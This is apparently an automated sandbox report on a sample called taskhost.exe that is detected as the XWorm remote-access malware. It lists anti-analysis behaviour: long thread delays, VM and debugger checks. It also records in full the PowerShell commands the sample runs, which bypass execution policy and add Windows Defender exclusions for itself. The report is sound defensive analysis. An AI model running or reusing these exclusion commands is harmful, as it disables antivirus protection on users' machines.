              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 597890Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 597781Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 597671Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 597562Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 597453Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 597343Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 597234Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 597125Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 597015Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 596906Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 596796Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 596687Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 596578Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 596468Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 596359Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 596250Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 596140Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 596031Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 595922Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 595812Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 595699Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 595593Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 595484Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 595328Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 595195Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 595025Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 594891Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 594656Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 594405Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 594295Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 594186Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 594078Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 593968Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 593859Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 593750Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 593640Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 593531Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 593421Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 593312Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeWindow / User API: threadDelayed 7243Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeWindow / User API: threadDelayed 2597Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6214Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3579Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7420Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2096Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep count: 36 > 30Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -33204139332677172s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -599875s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8024Thread sleep count: 7243 > 30Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8024Thread sleep count: 2597 > 30Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -599765s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -599656s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -599546s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -599437s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -599326s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -599218s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -599006s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -598823s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -598515s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -598122s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -597999s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -597890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -597781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -597671s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -597562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -597453s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -597343s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -597234s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -597125s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -597015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -596906s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -596796s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -596687s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -596578s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -596468s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -596359s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -596250s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -596140s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -596031s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -595922s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -595812s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -595699s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -595593s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -595484s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -595328s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -595195s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -595025s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -594891s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -594656s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -594405s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -594295s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -594186s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -594078s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -593968s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -593859s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -593750s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -593640s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -593531s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -593421s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exe TID: 8020Thread sleep time: -593312s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep time: -10145709240540247s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep count: 7420 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep count: 2096 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
              Source: C:\Users\user\Desktop\taskhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 599765Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 599546Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 599326Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 599218Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 599006Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 598823Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 598515Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 598122Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 597999Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 597890Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 597781Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 597671Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 597562Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 597453Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 597343Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 597234Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 597125Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 597015Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 596906Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 596796Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 596687Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 596578Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 596468Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 596359Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 596250Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 596140Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 596031Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 595922Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 595812Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 595699Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 595593Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 595484Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 595328Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 595195Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 595025Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 594891Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 594656Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 594405Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 594295Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 594186Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 594078Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 593968Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 593859Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 593750Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 593640Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 593531Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 593421Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 593312Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: taskhost.exeBinary or memory string: vmware
              Source: taskhost.exe, 00000000.00000002.2553079176.000000001BC83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
              Source: C:\Users\user\Desktop\taskhost.exeCode function: 0_2_00007FFAAC916C01 CheckRemoteDebuggerPresent,0_2_00007FFAAC916C01
              Source: C:\Users\user\Desktop\taskhost.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\taskhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\taskhost.exe'
              Source: C:\Users\user\Desktop\taskhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\taskhost.exe'Jump to behavior
              Bypasses PowerShell execution policy
              Source: C:\Users\user\Desktop\taskhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\taskhost.exe'
              Source: C:\Users\user\Desktop\taskhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\taskhost.exe'Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhost.exe'Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeQueries volume information: C:\Users\user\Desktop\taskhost.exe VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: taskhost.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.taskhost.exe.b00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.1261092658.0000000000B02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: taskhost.exe PID: 6504, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: taskhost.exe, type: SAMPLE
